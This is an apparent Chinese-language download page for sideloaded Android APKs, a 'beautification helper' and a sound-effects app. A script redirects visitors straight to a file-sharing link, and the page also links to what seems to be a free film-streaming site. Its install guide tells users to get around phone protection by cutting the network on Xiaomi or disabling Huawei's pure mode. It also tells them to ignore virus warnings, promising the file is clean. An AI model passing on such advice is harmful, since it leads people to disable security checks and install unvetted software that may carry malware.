<script>window.location.replace("https://ts263727.lanzoul.com/b0acjw3ah");</script>
<!--<!DOCTYPE html>
<html lang="zh">

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="referrer" content="never">
  <meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no,maximum-scale=1,minimum-scale=1">
  <title>美化助手永久地址发布页，收藏我回家不迷路！</title>
  <link rel="shortcut icon" href="img/anquan.ico" type="image/x-icon">
  <style>
    body {
      background: linear-gradient(to bottom right, #01a982 0, #60ae80 100%);
      margin: 0 auto;
      padding: 0;
      font-family: "-apple-system", "PingFang TC", "Microsoft JhengHei", "Source Sans Pro", Helvetica, sans-serif;
      font-size: 16px;
      padding-left: 20px;
      padding-right: 20px;
      padding-bottom: 20px;
    }

    .container {
      max-width: 550px;
      text-align: center;
      margin: 20px auto 0;
      padding: 20px;
      padding-top: 0px;
      background: #fff;
      border-radius: 15px;
    }

    .logo {
      padding: 15px;
    }

    .logo img {
      width: 150px;
      height: 150px;
    }

    .app_name {
      font-weight: bold;
      font-size: 26px;
      color: #212121;
      padding-top: 20px;
    }

    .subtitle {
      margin-top: 10px;
      color: #fff;
      font-weight: bold;
      background: #02a982;
      border-radius: 5px;
      padding-top: 5px;
      padding-bottom: 5px;
      font-size: 18px;
      line-height: 27px;
    }

    .subtitle2 {
      margin-top: 5px;
      color: #212121;
    }

    .button.rounded {
      border-radius: 9999px;
    }

    .download_container .button {
      height: 50px;
      display: block;
      border: 1px solid;
      color: #212121;
      font-size: 14px;
      max-width: 500px;
      margin: 0 auto 20px;
      line-height: 50px;
      font-weight: bold;
    }

    .download_container {
      margin-top: 20px;
    }

    a {
      text-decoration: none;
      -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
      -webkit-tap-highlight-color: transparent;
      outline: none;
      background: none;
      text-decoration: none;
    }

    a:hover,
    a:active,
    a:visited,
    a:link,
    a:focus {
      -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
      -webkit-tap-highlight-color: transparent;
      outline: none;
      background: none;
      text-decoration: none;
    }

    a:hover {}


    .button img {
      width: 20px;
      margin-right: 10px;
      margin-bottom: 5px;
      vertical-align: middle;
    }

    .problems {
      max-width: 500px;
      color: #212121;
      text-align: left;
      margin: 40px auto 0;
      /* color: #fe83a4; */
    }

    .problems_title {
      text-align: center;
      font-size: 20px;
      font-weight: bold;
      color: #212121;

    }

    .problems_subtitle {
      margin-top: 20px;
      font-weight: bold;
    }

    li {
      line-height: 25px;
      margin-bottom: 5px;
    }

    .ios_password {
      font-weight: bold;
      font-size: 24px;
      color: #01a982;
    }

    .footer {
      margin-top: 20px;
      color: #212121;
      line-height: 25px;
      font-size: 14px;
    }
  </style>
</head>

<body>
  <div class="container">

    <div class="download_container">

      <div class="app_name">美化助手发布页</div>
      <div class="subtitle"> 网址随时变化，防止走失！<br> 本页发布地址，请收藏保存 m.ziyuanapp.com</div>
      <div class="logo">
        <img src="img/page/labixiaoxin.jpeg">
      </div>
      <a class="button rounded button-ios animated" id="android_link" href="https://ts263727.lanzoul.com/b0acjw3ah">
        <img src="img/page/feiche.png">小橘子美化助手安卓版下载</a>

      <a class="button rounded button-ios animated" id="android_link" href="http://f.yyds666.fun">
        <img src="img/page/google.png">
        网页版访问免费影视网站</a>

        <a class="button rounded button-ios animated" id="android_link" href="https://ts263727.lanzoul.com/b0ad14i8f">
          <img src="img/page/ikun.jpg">热门鬼畜音乐盒安卓版下载<br>
        <span>鸡你太美鸡乐盒、夹音盒、太极盒等等好玩的音效盒</span></a>
        
    </div>
    <div class="problems">
      <div class="problems_title">安装教程（请耐心阅读）</div>
      <div class="problems_subtitle">安卓版：</div>
      <div>
        <ol>
          <li>点击下载按钮，下载文件格式为apk的安装包进行安装。</li>
          <li>由于安卓版未上架到应用市场，所以在安装过程中可能遇到手机防护软件拦截，您需要关闭拦截才可以正常使用，如：小米机型可以关闭网络进行安装，安装完再打开网络。华为机型可以选择关闭纯净模式。</li>
          <li>我们保证安装包不存在任何病毒及木马程序，如您在安装过程中遇到类似提示，一般是由于软件被人举报导致，不必理会即可。</li>
          <li>我们保证美化助手永久免费使用，永久维护更新。</li>
          <li>请您务必在本页面下载软件，不要使用他人下载地址，否则可能会给您带来不要的损失。</li>
        </ol>
      </div>
    </div>
    <div class="footer">
      祝您生活愉快，万事如意~~<br>美化助手 © m.ziyuanapp.com
    </div>
  </div>

</body>

</html>-->